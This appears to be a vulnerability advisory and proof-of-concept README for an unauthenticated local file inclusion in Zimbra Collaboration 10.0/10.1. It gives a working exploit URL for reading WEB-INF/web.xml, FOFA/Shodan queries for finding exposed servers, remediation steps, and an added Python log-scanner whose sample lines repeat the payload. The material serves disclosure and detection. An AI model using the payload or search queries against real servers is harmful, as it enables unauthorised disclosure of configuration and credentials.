📄 Zimbra Collaboration 10.0 / 10.1 Local File Inclusion

🗓️ 02 Jan 2026 00:00:00 · Reported by MaxMnMl, sirifu4k1 · Type: packetstorm
🔗 packetstorm.news · 👁 497 Views

Unauthenticated LFI in Zimbra Collaboration 10.0/10.1 RestFilter enables WebRoot file disclosure via /h/rest.

Code
# zimbramail-CVE-2025-68645-poc

A proof-of-concept exploiting a Local File Inclusion (LFI) vulnerability existing in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet.

# Vulnerability

The vulnerability exists due to improper input validation in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

-   User-controlled parameters are not correctly sanitized.
-   Internal request routing can be manipulated.
-   Arbitrary files under the WebRoot directory may be included in server responses.

# Affected Versions

-   Zimbra versions 10.0.x prior to 10.0.18
-   Zimbra versions 10.1.x prior to 10.1.13

# PoC (by sirifu4k1)

```
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
```

# Automation

Nuclei template:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml

# Into the wild

FOFA:

```
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
```

SHODAN:

```
http.title:"Zimbra Web Client Sign In"
```

# Impact

An unauthenticated remote attacker can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.

-   Read sensitive files (configs, environment data)
-   Leak credentials or internal paths
-   Gather intelligence for further exploitation
-   Chain with other vulnerabilities for deeper compromise

CVSS 3.x vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS 3.x base score: 8.80
CVSS 3.x severity: HIGH

# Remediation & Mitigation

Update to the latest version of Zimbra Collaboration.

-   ZCS 10.0.18
-   ZCS 10.1.13 and later

Recommended actions:

1. Upgrade immediately to a patched version
2. Disable Classic UI if not required
3. Monitor logs for suspicious access to `/h/rest`
4. Restrict public access to Zimbra web endpoints where possible
5. Review WebRoot permissions and exposed files
    
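The vulnerability description and recommended action 3 ("Monitor logs for suspicious access to `/h/rest`") describe what a defender should be looking for without showing how. The script below is an added example of that detection logic; it is not part of this PoC repository or of the advisory. It runs over constructed combined-format access log lines (the documentation addresses 192.0.2.x / 198.51.100.x are made up) and assumes the front-end proxy records the raw request line, as nginx and Apache do by default. It generalizes beyond the single parameter shown in the PoC: any query parameter whose decoded name starts with `javax.servlet.` is flagged, because the Servlet specification reserves that prefix for container-internal include/forward attributes that a client has no reason to send, and any parameter value pointing into `WEB-INF` or `META-INF` is flagged as well. Percent-decoding is applied to names and values before matching, since a literal grep for the PoC string misses the URL-encoded form that appears in the second sample line.

```python
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# One combined-log-format line: client, ident, user, [timestamp], "request line",
# status, bytes (referer and user agent are not needed for this check).
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The Servlet spec reserves this prefix for container-internal include/forward
# attributes; a client has no legitimate reason to send one as a query parameter.
RESERVED_PARAM_PREFIX = "javax.servlet."
# Endpoint named in the advisory; anchored so that e.g. /h/restore does not match.
REST_PATH_RE = re.compile(r"/h/rest(?:/|$)")
# Directories a servlet container never serves directly.
PROTECTED_DIR_RE = re.compile(r"(?:^|/)(?:WEB-INF|META-INF)(?:/|$)", re.IGNORECASE)


def _decode(s: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so a doubly encoded name or value
    is compared in its plain form."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_line(line: str) -> Optional[Dict]:
    """Return a finding for a suspicious /h/rest request, or None."""
    m = _LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than crash
    parts = urlsplit(m.group("target"))
    path = _decode(parts.path)
    if not REST_PATH_RE.search(path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    reasons: List[str] = []
    reserved_seen = False
    for raw_name, values in params.items():
        name = _decode(raw_name)
        if name.startswith(RESERVED_PARAM_PREFIX):
            reserved_seen = True
            reasons.append(f"client-supplied reserved parameter {name!r}")
        for value in values:
            plain = _decode(value)
            if PROTECTED_DIR_RE.search(plain):
                reasons.append(f"parameter {name!r} references protected directory {plain!r}")
    if not reasons:
        return None
    status = int(m.group("status"))
    # A 200 on a request carrying a reserved include parameter suggests the
    # server honoured the dispatch override; anything else is worth a look but
    # is more likely a blocked or failed probe.
    severity = "high" if reserved_seen and status == 200 else "medium"
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "status": status,
        "path": path,
        "severity": severity,
        "reasons": reasons,
    }


def scan(lines: Iterable[str]) -> List[Dict]:
    """Run analyse_line over a log and keep only the findings."""
    return [f for f in (analyse_line(line) for line in lines) if f is not None]


# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jan/2026:10:15:01 +0000] "GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 5120 "-" "curl/8.5.0"
192.0.2.11 - - [02/Jan/2026:10:15:07 +0000] "GET /h/rest?javax%2Eservlet%2Einclude%2Eservlet_path=%2FWEB-INF%2Fweb.xml HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
198.51.100.5 - - [02/Jan/2026:10:16:00 +0000] "GET /h/rest?id=257&fmt=json HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.6 - - [02/Jan/2026:10:16:30 +0000] "POST /service/soap HTTP/1.1" 200 1490 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(f"[{finding['severity'].upper()}] {finding['client']} "
              f"{finding['timestamp']} status={finding['status']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

Pipe a real access log in place of `SAMPLE_LOG` (for example `scan(open(path))`) and feed the findings to whatever alerting you use; a "high" finding on a host still running a version listed under Affected Versions should be treated as a probable disclosure of the referenced file.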
# References

https://nvd.nist.gov/vuln/detail/CVE-2025-68645

https://wiki.zimbra.com/wiki/Security_Center

https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy

https://x.com/sirifu4k1/status/2006031417088639064

# Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.
